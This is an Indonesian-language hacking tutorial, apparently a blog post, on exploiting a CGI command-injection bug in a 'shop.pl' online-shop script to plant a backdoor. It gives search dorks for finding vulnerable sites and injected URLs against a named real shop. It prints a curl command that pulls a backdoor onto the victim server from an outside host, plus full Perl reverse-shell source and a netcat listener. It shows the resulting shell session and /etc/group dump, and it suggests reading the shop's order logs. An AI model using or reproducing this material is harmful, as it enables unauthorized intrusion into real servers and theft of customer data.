.:.:.:.:.:.:..:.:.:.:.:.:..:.:.:.:.:.:..:.:.:.:.:.:..:.:.:.:.:.:..:.:.:.:.:.
Penulis tidak bertanggung jawab atas akibat atau dampak yang disebabkan oleh
penggunaan materi dari tutorial ini. Tujuan penulis hanya ingin menyampaikan
materi kepada pihak-pihak yang bertanggung jawab dan "Want to learn", tidak
kepada pihak-pihak yang ingin merugikan orang lain.
.:.:.:.:.:.:..:.:.:.:.:.:..:.:.:.:.:.:..:.:.:.:.:.:..:.:.:.:.:.:..:.:.:.:.:.
Intro
$>Seperti yang sudah kita tahu Bug CGI memungkinkan kita untuk melaksanakan command-command
untuk meng-eksploitasi sistem. Tetapi hal ini juga dipengaruhi oleh settingan dari sistem
tersebut apakah mengijinkan kita untuk membuat/menulis File di Server tersebut.
Tujuan
$>Membuat suatu backdoor dengan cara connect back melalui CGI Bug
Tools atau Softwarez dan Skill yang diperlukan
$>Setidaknya mengerti perintah/command *Nix atau Linux (ls, cp, rm, cat, locate ,dll)
$>Softwarez : Browser HTML (Opera, FireFox, IE, dll)
$>Tools : NetCat dan file backdoor (.txt atau .prl)
Tutorial
$>Langkah pertama yang harus dilakukan adalah mencari site yang menggunakan CGI dengan bug :
"shop.pl?seite" atau "family_showpage.cgi". Bagaimana mencarinya? yaitu googling dan memasukkan
keyword allinurl dengan tambahan bug diatas. Contoh, allinurl : "shop.pl?seite". Maka kita akan
dapat berbagai macam halaman yang dapat di-tes bugnya. Pilih salah satu dan kita akan memulai mencoba
connect back.
$>Langkah kedua yaitu masukkan perintah/command yang diinginkan diantara char "||", maka perintah kita
akan terlihat seperti ini : |perintah|, selain dengan char pipe(|) bisa juga menggunakan char ";".
Contoh (dengan bug shop.pl?seite) :
>> https://www.a66.de/cgi-local/shop.pl?seite=hauptseite.html&KNR=3055892
>> https://www.a66.de/cgi-local/shop.pl?seite=hauptseite.html|perintah|&KNR=3055892
>> https://www.a66.de/cgi-local/shop.pl?seite=hauptseite.html|ls|&KNR=3055892
Maka pada browser kita akan terlihat isi dari direktori server tersebut.
Contoh :
finnishorder.pl formmailmalaysia.pl honeymoon.cfg honeymoon.pl honeymoonfinnishorder.pl
honeymoonorder.pl ikonboard order.pl preise.pl remview.php shop.cfg shop.pl
Weikkss....Banyak filenya tuh :P
$>Langkah ketiga cek apakah kita diijinkan untuk menulis/membuat file disana dengan perintah "id"
>> https://www.a66.de/cgi-local/shop.pl?seite=hauptseite.html|id|&KNR=3055892
Kalo benar maka akan tampak :
uid=290076(ade001) gid=103(web) groups=103(web)
Perhatikan User-idnya, Wah sepertinya kita bisa nih nulis/remove File :D
$>Selanjutnya kita upload File Backdoor yang kita ambil dari site lain,
https://www.a66.de/cgi-local/shop.pl?seite=hauptseite.html|curl -o back.txt http://www.goodwillco.com/tes.txt|&KNR=3055892
Catatan : Site www.goodwillco.com hanya menyediakan file backdoor yaitu tes.txt, kalo sudah tidak ada silahkan
copy-paste teks berikut kedalam Notepad dan simpan dengan Ekstensi *.txt, Coding by 1St :D
#!/usr/bin/perl
# Remote Connect-Back Backdoor Shell v1.0.
# (c)AresU 2004
# 1ndonesia Security Team (1st)
# AresU[at]bosen.net
# Usage:
# 1) Listen port to received shell prompt using NetCat on your toolbox, for example: nc -l -p 9000
# 2) Remote Command Execution your BackDoor Shell, for example: perl connect.pl
# --------
# The supplied exploit code is not to be used for malicious purpose, but for educational purpose only. The Authors and 1ndonesian Security Team WILL NOT responsible for anything happened by the couse of using all information on these website.
# ---------
use Socket;
$pamer="(c)AresU Connect-Back Backdoor Shell v1.0\n1ndonesia Security Team (1st)\n\n";
$cmd= "lpd";
$system= 'echo "`uname -a`";echo "`id`";/bin/sh';
$0=$cmd;
$target=$ARGV[0];
$port=$ARGV[1];
$iaddr=inet_aton($target) || die("Error: $!\n");
$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
print STDOUT $pamer;
system($system);
close(STDIN);
close(STDOUT);
close(STDERR)
Catatan2 : curl -o akan menyimpan file backdoor di server web sasaran dengan nama back.txt
Kalo curl -o tidak bisa gunakan wget -o.
$> Lakukan lagi perintah ls untuk melihat apakah file backdoor kita sudah ter-upload...
https://www.a66.de/cgi-local/shop.pl?seite=hauptseite.html|ls|&KNR=3055892
back.txt finnishorder.pl formmailmalaysia.pl honeymoon.cfg honeymoon.pl honeymoonfinnishorder.pl
honeymoonorder.pl ikonboard order.pl preise.pl remview.php shop.cfg shop.pl
Tampaknya file backdoor kita sudah ada tuh :D
$> Buka port di kompie kita dengan binding port melalui netcat.exe, Perintahnya >
C:\>netcat.exe -lLvvp 9000
catatan: port 9000 dan drive system bisa diganti sesuai dengan kondisi komputer masing2 :D
Kalo sudah maka netcat akan melisten koneksi yang masuk di port 9000 tersebut
$> Kita akan melakukan connectback dari server korban dengan meng-compile file backdorr tsb :
https://www.a66.de/cgi-local/shop.pl?seite=hauptseite.html|PERL back.txt 61.xxx.xxx.xxx 9000|&KNR=3055892
catatan: ip 61.xxx.xxx.xxx adalah alamat IP komputer kita dan 9000 adalah port tujuan yang sudah terbuka
jika komputer kita memakai proxy atau firewall harap di konfigurasi ulang agar server korban bisa melakukan
connectback terhadap kita :D
Bila benar maka :
C:\>netcat -lLvvp 9000
listening on [any] 9000 ...
connect to [61.xxx.xxx.xxx] from www.a66.de [213.198.17.90] 14542
(c)AresU Connect-Back Backdoor Shell v1.0
1ndonesia Security Team (1st)
Linux a66.de 2.4.2 FreeBSD 4.7-RELEASE-p22 #5: Tue May 3 13:36:49 MDT 2005
roo i386 unknown
uid=290076(ade001) gid=103(web) groups=103(web)
ls
back.txt
finnishorder.pl
formmailmalaysia.pl
honeymoon.cfg
honeymoon.pl
honeymoonfinnishorder.pl
honeymoonorder.pl
ikonboard
order.pl
preise.pl
remview.php
shop.cfg
shop.pl
su
su: you are not in the correct group (sys) to su root.
weiikkssss....bisa konek ternyata :D, tapi sayangnya kita gak bisa akses super user tuh :(
Mungkin kita bisa liat groupnya :
https://www.a66.de/cgi-local/shop.pl?seite=hauptseite.html|ls /etc|&KNR=3055892
DIR_COLORS X11 bashrc csh.cshrc csh.login filesystems group host.conf hosts.allow hosts.deny info-dir inputrc
ld.so.cache ld.so.conf ldap_auth master.passwd mhpop_redirect mtab nsswitch.conf opt pam.d passwd profile profile.d
redhat-release rpc rpm securetty shells skel ssd.attrib syb_dbs termcap xinetd.d yp.conf
https://www.a66.de/cgi-local/shop.pl?seite=hauptseite.html|cat /etc/group|&KNR=3055892
sys::0:root,bin,sys,adm,devel,smoc1,daemon,vbackups,sap,sentinel root::0:root daemon::1:root,daemon bin::2:root,bin,daemon
adm::3:root,adm,daemon mail::4:root uucp::5:uucp rje::8: lp:*:9: nuucp::10:nuucp user::20: ftp::201:
other::995: guest:*:998: postgres:*:70: news:*:86: mysql:*:88: sql:*:89: staff::100:devel,smoc1 sybase::101:sybase,devel,webapps,sap,jkoecher,anonweb
client:*:102:devel,root,webapps,urchind web:*:103:root,webapps nofiles:*:104: qmail:*:105: devel:*:106:sybase,hu,webapps,sap,ftp,jkoecher,anonweb mailed:*:107:barryg
apps:*:108:hu,idsuser networks:*:109: squid:*:203: solutions:*:1025: test:*:204: dnsadmin:x:501:named tsedit:*:110:lvance,chuckr,eduda,ggarza,steve,mbalme mailedit:*:111:mminnig
nogroup:*:65533: webapps:*:149: sap:*:191: nobody:*:60001: smmsp:*:25:smmsp
Wekkksss...... :( ternyata kita hanya ada di group web doank :~~...gimana ngerubahnya ???
sayangnya tutorial ini hanya membahas caraa kita untuk melakukan connectback dengan menggunakan CGI BUG
Untuk lebih jelasnya silakan cari artikel ttg hal tsb di Google :D
Terus kita bisa ngapain ajah nih??? ya macam2 kayak liat file order.log-nya mungkin !!!???? :D
(ingat site ini adalah semacam online-shop :D), silakan masukkan perintah locate order.log atau
locate .log di browser anda :D hehehehehehhe
Special Thanks go to : Myztx @ Myztx Soft House, Om choi @ #e-c-h-o atas tutor dan kesabarannya dalam mengajari junior mu ini :D
, admin www.a66.de hehehehe jangan marah ya mas/mbak :P webnya dijadikan percobaan :D
n ndak lupa juga to Spyro (the dragon??? :P) atas tempat buat artikel ini di webnya yg makin ciamik :D
2 komentar:
Posting Komentar